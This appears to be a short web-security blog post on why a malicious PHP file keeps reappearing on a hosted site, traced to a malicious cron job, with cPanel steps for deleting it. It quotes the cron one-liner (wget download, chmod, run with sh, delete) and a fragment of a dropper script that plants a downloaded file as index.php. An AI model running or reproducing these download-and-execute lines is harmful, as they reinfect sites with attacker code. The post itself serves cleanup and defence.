Malicious PHP file keeps getting automatically added? Here’s a fix

If malicious files are created right after you delete them, then a malicious Cronjob may be the cause.
Otherwise, a UNIX process that runs as a background task may trigger the hack.

In this particular case, we’ve identified a bad Cronjob.

Need help? Let us clean your site.

wget -q -O xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/leinders/public_html 813-1 && rm -f xxxd

To delete a cron job in cPanel:

  • Login to your cPanel account
  • Go to Advanced > Cron Jobs
  • Next, go to “Current Cron Jobs”
  • Click the Delete link on the row with the malicious cron job.
  • Next – Delete this cron job?
    Hit the Delete button – cron job is finally deleted.

Malicious URLs:


Malicious files example:

Malicious bash script:


if [ ! -d ${root_dir}/css ];
	mkdir -p ${root_dir}/css;

cd ${root_dir}/css;
rm -f wp-class.txt;wget -q -O wp-class.txt && mv wp-class.txt index.php;